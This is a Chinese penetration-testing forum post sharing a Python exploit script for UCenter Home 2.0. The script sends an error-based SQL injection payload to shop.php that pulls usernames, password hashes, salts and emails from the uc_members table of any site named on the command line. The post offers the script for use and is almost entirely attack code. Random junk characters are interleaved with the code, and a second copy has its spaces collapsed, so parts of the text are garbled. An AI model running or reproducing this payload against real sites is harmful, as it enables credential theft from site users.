找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1954|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl" D! I8 b% Q% j7 i. a9 D
- T. T1 W" G9 K7 U) F
1 c* I! ~: f" V  g( v; Y
#!/usr/bin/env python  
8 E1 o; y6 W0 ^' S* i- [
$ Q( Q' P  P  s# @8 cimport sys  
' v. W' q% R0 H6 Y# r, timport urllib2  
! n9 _8 v# M! i) R  v( zimport re  0 l8 p5 T0 e0 ^5 a

$ }& _, q6 s' F# g9 D" E! }, udef info():  8 T" ?. P" |/ v' C
    print 'From:http://www.exploit-db.com/exploits/14997/' # k# o' d  R$ b
    print 'http://www.hake.cc/Web_loudong/' ; ^3 i$ s* u' b
    print 'changed:qiaoy'  9 e5 z8 u0 d# `" g) i
    print 'exp:'  & b  D& ?+ N$ j2 ^: C2 M% W7 K% z
    print ' ./UCenter_Home_2.0.py site'  ) [7 @! E; O) n
  X/ X/ L5 d# W+ C, X, Y
def main():  7 ]) b* b% {) \  b/ {) r8 i
    if len(sys.argv) != 2:  ) E' Y+ i6 m1 @! _$ }  R9 E
        info()  * j% X; B# \! z7 t" {
    else:  
. y: a0 f0 Z0 Y! h) v+ D6 ]/ p        site = sys.argv[1]  ( j( P) X+ _' T
        if site[0:7] == 'http://':  & p- t5 t+ |) G: S; I$ N0 R
            sitesite =site  7 {& m( @6 D1 V4 {3 k. U) j  G
        elif site[0:8] == 'https://':  9 r" Y: I: m9 _4 _* R, ?' e: H- ~! S
            sitesite = site  0 {& H) U/ c9 K6 Q) A+ G+ j
        else:  
  G' \. e3 f! b+ U3 Y9 x            site = 'http://'+site  
) C; `1 F! `) ]& N& |& J9 e; f        try:  
2 j9 N8 Q" Q4 F            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  7 Z. I. ]7 b/ z# k: M
            Value = urllib2.urlopen(url).read()  
/ `- P2 N; `0 Q+ Y            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
) s/ W, T/ Y! a1 O! H  i            hacked = Msg.split(':')  
- @% {* J" \. W7 D9 g9 U' M            print 'Name:    '+hacked[1]  
/ v* d$ o# n& b% q            print 'Passwd:  '+hacked[2]  
+ x( [2 T- ~0 D* O; L" L# w            print 'salt:    '+hacked[3]  
" ], X: R0 ?- z5 h' M            print 'email:   '+hacked[4]  1 H$ {+ a! h9 {8 T* l) b
        except:  1 G+ q  k; c( ^3 g7 W: F
            print 'Sorry,I can\'t work............'  : P5 m3 j  R% K' ~# B

" J% ?: s9 @  `% Cif __name__ == '__main__':  2 o- @- }9 \1 H4 ^4 k" u# a1 k
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表